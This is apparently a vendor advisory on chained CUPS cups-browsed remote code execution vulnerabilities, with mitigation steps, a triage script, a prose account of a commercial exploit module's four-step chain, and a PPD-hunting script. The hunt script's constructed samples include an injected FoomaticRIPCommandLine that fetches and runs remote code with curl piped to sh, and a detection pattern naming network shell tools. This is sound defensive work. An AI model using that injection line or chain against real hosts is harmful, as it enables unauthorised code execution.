Updated:
Status:
CVEs:
Fortra is actively researching several vulnerabilities in CUPS, the OpenPrinting print system shipped with Linux and other UNIX-like systems. Chained together, these vulnerabilities allow a remote unauthenticated attacker to achieve remote code execution: a single UDP packet to port 631 is enough when the cups-browsed port is reachable from the Internet, and on the LAN the same result can be achieved by spoofing zeroconf / mDNS / DNS-SD advertisements. The injected command runs when a print job is sent to the attacker's fake printer. Customers are recommended to update the CUPS packages to mitigate these vulnerabilities.
Who is affected?
Linux and other UNIX-like systems running CUPS with the cups-browsed service are affected; the exposure is greatest where cups-browsed is enabled and reachable on UDP port 631. The affected packages (cups-browsed, cups-filters, libcupsfilters and libppd) are available for most distributions but may or may not be installed or enabled by default. Check your distribution's security advisories to determine if you are affected.
- Red Hat advisory
- Debian advisories
- Ubuntu advisories
- Amazon Linux advisories
- SUSE advisories
What can I do?
The following mitigation steps are recommended:
- Disable and remove the cups-browsed service if it is not needed.
- Update the CUPS packages (cups-browsed, cups-filters, libcupsfilters and libppd) from your distribution.
- If the system cannot be updated, block inbound traffic to UDP port 631 at the host or network firewall, and consider blocking DNS-SD / mDNS traffic as well, since that is the LAN attack path.
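The steps above, turned into a host triage script. This is an added example written for this article, not Fortra's tooling: it checks whether cups-browsed is bound to UDP 631 on a wildcard address by parsing `ss -ulnp` output, checks whether /etc/cups/cups-browsed.conf still has remote discovery switched on (the BrowseRemoteProtocols directive, which a value of `none` disables; the script assumes that is the only directive used for this), and with `--fix` applies the disable/mask and a host firewall rule for UDP 631 (plus UDP 5353 when the script's own CUPS_TRIAGE_BLOCK_MDNS switch is set). The ss output and config fragments embedded in it are constructed samples so the checks can be exercised offline.

```shell
#!/bin/sh
# Added example for this advisory, not Fortra's own tooling. Host triage
# for the cups-browsed exposure: the check functions take captured command
# output as their argument, so they run offline against the constructed
# samples below and, with --check/--fix, against the live host.

# Constructed sample of `ss -ulnp` output from an exposed host.
SS_EXPOSED='State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
UNCONN 0      0            0.0.0.0:631       0.0.0.0:*    users:(("cups-browsed",pid=1234,fd=7))
UNCONN 0      0            0.0.0.0:5353      0.0.0.0:*    users:(("avahi-daemon",pid=800,fd=12))'

# Constructed sample after cups-browsed was stopped: only mDNS remains.
SS_SAFE='State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
UNCONN 0      0            0.0.0.0:5353      0.0.0.0:*    users:(("avahi-daemon",pid=800,fd=12))'

# Constructed cups-browsed.conf fragments (directive commented out = default).
CONF_DEFAULT='# BrowseRemoteProtocols dnssd cups
BrowseLocalProtocols dnssd'
CONF_HARDENED='BrowseRemoteProtocols none'

# 1. Is cups-browsed bound to UDP 631 on a wildcard address (IPv4 or IPv6)?
#    $1 = output of `ss -ulnp`. Returns 0 if exposed, 1 otherwise.
cups_browsed_exposed() {
    printf '%s\n' "$1" \
        | grep -E '^UNCONN[[:space:]]' \
        | grep -E '(0\.0\.0\.0|\*|\[::\]):631[[:space:]]' \
        | grep -q 'cups-browsed'
}

# 2. Does cups-browsed still accept remote printer advertisements?
#    $1 = contents of /etc/cups/cups-browsed.conf. Assumption: the host
#    controls this only through BrowseRemoteProtocols; when the directive
#    is absent or commented out the compiled-in default applies, which is
#    treated as enabled. The last occurrence wins. Returns 0 if enabled.
browse_remote_enabled() {
    val=$(printf '%s\n' "$1" \
        | grep -E '^[[:space:]]*BrowseRemoteProtocols[[:space:]]' \
        | tail -n 1 \
        | sed -E 's/^[[:space:]]*BrowseRemoteProtocols[[:space:]]+//' \
        | tr 'A-Z' 'a-z' \
        | sed 's/[[:space:]]*$//')
    [ "$val" != "none" ]
}

# 3. Mitigation steps from the advisory, applied only on request (as root).
#    Stops and masks cups-browsed, then drops inbound UDP 631; set
#    CUPS_TRIAGE_BLOCK_MDNS=1 (this script's own switch) to also drop the
#    mDNS port 5353 that DNS-SD advertisements arrive on.
apply_mitigation() {
    systemctl disable --now cups-browsed
    systemctl mask cups-browsed
    iptables -I INPUT -p udp --dport 631 -j DROP
    if [ "${CUPS_TRIAGE_BLOCK_MDNS:-0}" = 1 ]; then
        iptables -I INPUT -p udp --dport 5353 -j DROP
    fi
}

# Live mode: `sh cups-triage.sh --check` reports, `--fix` also mitigates.
# With no argument the script only defines the functions and samples.
case "${1:-}" in
--check|--fix)
    ss_out=$(ss -ulnp 2>/dev/null || true)
    conf=$(cat /etc/cups/cups-browsed.conf 2>/dev/null || true)
    if cups_browsed_exposed "$ss_out"; then
        echo "EXPOSED: cups-browsed is listening on UDP 631 on a wildcard address"
    else
        echo "ok: cups-browsed is not listening on a wildcard UDP 631"
    fi
    if browse_remote_enabled "$conf"; then
        echo "WARN: BrowseRemoteProtocols is not 'none'; remote printer discovery is active"
    fi
    if [ "$1" = "--fix" ]; then
        apply_mitigation
    fi
    ;;
esac
```

Run it as root with `--check` first; `--fix` stops and masks cups-browsed and inserts iptables DROP rules that do not survive a reboot, so persist them with your distribution's firewall tooling. The firewall rule is a stop-gap for hosts that cannot be updated; updating the packages remains the fix.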
How is Fortra helping me?
Fortra is actively researching this threat to build detection capabilities in addition to those listed below.
Alert Logic Network IDS: Alert Logic released IDS telemetry signatures to aid in detection research.
Alert Logic Vulnerability Scanning: Alert Logic released agent-based scan detection for Ubuntu and RHEL on September 30, 2024. Additionally, Alert Logic released authenticated scan coverage for Alma, Ubuntu, and RHEL on October 1, and for Amazon Linux 2023 on October 8.
Core Impact: The exploit “Linux OpenPrinting cups-browsed Remote Code Execution Exploit” for the chained CUPS vulnerabilities CVE-2024-47176, CVE-2024-47076, CVE-2024-47175 and CVE-2024-47177 was delivered to Core Impact customers. This module chains four vulnerabilities to deploy an agent on a Linux target that runs with the privileges of the cups-browsed daemon user.
- The first vulnerability (CVE-2024-47176) is in cups-browsed, which binds to UDP INADDR_ANY:631 and trusts any packet from any source; a single packet makes it send a Get-Printer-Attributes IPP request to an attacker-controlled URL.
- The module then abuses a vulnerability (CVE-2024-47076) in libcupsfilters, where the function cfGetPrinterAttributes5 does not validate or sanitize the IPP attributes returned by the IPP server, so attacker-controlled data flows into the rest of the CUPS system.
- After that it uses a third vulnerability (CVE-2024-47175) in libppd, where the function ppdCreatePPDFromIPP2 writes those IPP attributes into a temporary PPD file without validation or sanitization, allowing attacker-controlled lines to be injected into the resulting PPD.
- The last vulnerability (CVE-2024-47177) is in cups-filters, where foomatic-rip executes the contents of the FoomaticRIPCommandLine PPD parameter as a shell command. The module starts a fake IPP server that delivers the payload for these last three vulnerabilities, creating a fake printer on the target system, and then sends a UDP packet to the target to exploit the first vulnerability.
- Finally, the chain is triggered by sending an HTTP request to the CUPS Management Interface to print a test page on the fake printer; processing that job executes the injected command, which deploys the agent. The URL of the CUPS Management Interface can be set with the CUPS_MANAGEMENT_URL parameter; if no value is specified, http on TCP port 631 is used.
- If that final step fails (for example because the CUPS Management Interface listens only on the loopback interface), the module keeps running for a period of time, waiting for the target system itself to create a print job on the fake printer, which delivers the attack and deploys the agent. The wait time (in seconds) can be changed with the ATTACK_TIMEOUT parameter; the default, which is also the minimum, is 90 seconds.
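The chain above leaves a durable artifact on the victim: a PPD under /etc/cups/ppd for a printer nobody added, whose FoomaticRIPCommandLine is the attacker's command. The following hunt script is an added example written for this article, not Fortra's code and not part of the Core Impact module. It classifies PPD text as injected (a FoomaticRIPCommandLine in a PPD that was generated from IPP attributes; the script assumes such PPDs carry `*PCFileName: "drvless.ppd"`, and a driverless queue has no reason to combine that with foomatic-rip), suspicious (a Foomatic command line containing command chaining, command substitution or network tools, a heuristic chosen for this example), or clean, and it only counts the command line when a cupsFilter/cupsFilter2 line actually routes jobs through foomatic-rip. The PPD samples are constructed; 192.0.2.10 is a documentation-range placeholder address.

```shell
#!/bin/sh
# Added example for this advisory, not Fortra's code or part of the Core
# Impact module. Hunts for PPDs carrying an injected FoomaticRIPCommandLine.
# ppd_verdict takes PPD text as $1 so it runs offline; scan_ppd_dir applies
# it to every PPD in a directory (default /etc/cups/ppd).

# Shell constructs that do not belong in a vendor Foomatic command line.
# Heuristic chosen for this example: a legitimate Foomatic command line is
# one pipeline of print tools (gs, pnmtops, ...) and never chains commands
# or fetches anything from the network.
SUSPICIOUS_RE='(\$\(|`|;|&&|\|\||/dev/tcp|curl |wget |nc |sh -c|python)'

# Constructed sample: PPD as the chain would leave it. Assumption: PPDs
# generated from IPP attributes carry *PCFileName: "drvless.ppd".
PPD_INJECTED='*PPD-Adobe: "4.3"
*FormatVersion: "4.3"
*PCFileName: "drvless.ppd"
*Manufacturer: "Example"
*ModelName: "Example Printer"
*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "id > /tmp/cups-marker"'

# Constructed sample: benign vendor PPD with a normal Foomatic command line.
PPD_VENDOR='*PPD-Adobe: "4.3"
*PCFileName: "GENERIC_PXL.ppd"
*cupsFilter: "application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dPARANOIDSAFER -dQUIET -dNOPAUSE -sDEVICE=pxlmono -sOutputFile=- -"'

# Constructed sample: vendor-looking PPD whose command line was edited.
PPD_TAMPERED='*PPD-Adobe: "4.3"
*PCFileName: "GENERIC_PXL.ppd"
*cupsFilter: "application/vnd.cups-postscript 0 foomatic-rip"
*FoomaticRIPCommandLine: "gs -q -sDEVICE=pxlmono -sOutputFile=- - ; curl -s http://192.0.2.10/x | sh"'

# Print the first FoomaticRIPCommandLine value (text between the quotes),
# or nothing if the PPD has none.
foomatic_cmdline() {
    printf '%s\n' "$1" \
        | grep -E '^\*FoomaticRIPCommandLine:' \
        | head -n 1 \
        | sed -E 's/^\*FoomaticRIPCommandLine:[[:space:]]*"(.*)".*$/\1/'
}

# Verdict for one PPD: prints injected, suspicious, or clean.
ppd_verdict() {
    ppd=$1
    cmd=$(foomatic_cmdline "$ppd")
    if [ -z "$cmd" ]; then
        echo clean; return 0
    fi
    # The command line only matters if a cupsFilter/cupsFilter2 line routes
    # the job through foomatic-rip; otherwise it is never executed.
    if ! printf '%s\n' "$ppd" | grep -Eq '^\*cupsFilter2?:.*foomatic-rip'; then
        echo clean; return 0
    fi
    if printf '%s\n' "$ppd" | grep -Eq '^\*PCFileName:[[:space:]]*"drvless\.ppd"'; then
        echo injected; return 0
    fi
    if printf '%s\n' "$cmd" | grep -Eq "$SUSPICIOUS_RE"; then
        echo suspicious; return 0
    fi
    echo clean
}

# Walk a PPD directory and report everything that is not clean, with the
# command line so the analyst can see what would have run.
scan_ppd_dir() {
    dir=${1:-/etc/cups/ppd}
    for f in "$dir"/*.ppd; do
        [ -f "$f" ] || continue
        text=$(cat "$f")
        v=$(ppd_verdict "$text")
        [ "$v" = clean ] || printf '%s\t%s\t%s\n' "$v" "$f" "$(foomatic_cmdline "$text")"
    done
}

# `sh ppd-hunt.sh --scan [dir]` runs against the host; with no argument the
# script only defines the functions and samples.
if [ "${1:-}" = "--scan" ]; then
    scan_ppd_dir "${2:-/etc/cups/ppd}"
fi
```

A hit is a lead, not proof: vendor Foomatic PPDs legitimately carry a FoomaticRIPCommandLine, so compare any flagged queue with `lpstat -v`, whose device URI shows which host the printer points at, before acting. Injected PPDs and the fake queue should be removed along with the print jobs that targeted it.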
Fortra VM: Fortra VM released new authenticated checks for CVE-2024-47176, CVE-2024-47076, and CVE-2024-47175 on October 3, 2024, via Network Scanner 4.51.1, ELSA-2024-7346: cups-filters security update (160879) and RHSA-2024:7346: cups-filters security update (160793).
Tripwire IP360: Tripwire released authenticated scan coverage on October 2, 2024, to identify vulnerable instances. If the vulnerabilities are found, the following Tripwire vulnerability IDs will match:
- CVE-2024-47176: 666795, 666788, 666780, 666747, 665804, 665800, or 665615
- CVE-2024-47076: 666794, 666787, 666782, 666779, 666746, 665807, 665803, or 665614
- CVE-2024-47175: 666796, 666786, 666781, 666777, 666744, 665820, 665819, or 665613
- CVE-2024-47177: 666778 or 666745
Updates
Fortra has kicked off the Emerging Threats process for these vulnerabilities. This article will be updated with new information about the vulnerabilities and related security coverage as it becomes available.
09/30/2024: Alert Logic released agent-based scan detection for Ubuntu and RHEL.
10/01/2024: Alert Logic released authenticated scan coverage for Alma, Ubuntu, and RHEL.
10/02/2024: Tripwire IP360 released authenticated scan coverage.
10/03/2024: Fortra VM released new authenticated checks for CVE-2024-47176, CVE-2024-47076, and CVE-2024-47175.
10/08/2024: Alert Logic released authenticated scan coverage for Amazon Linux 2023.
10/11/2024: Core Impact released a new exploit for these CVEs.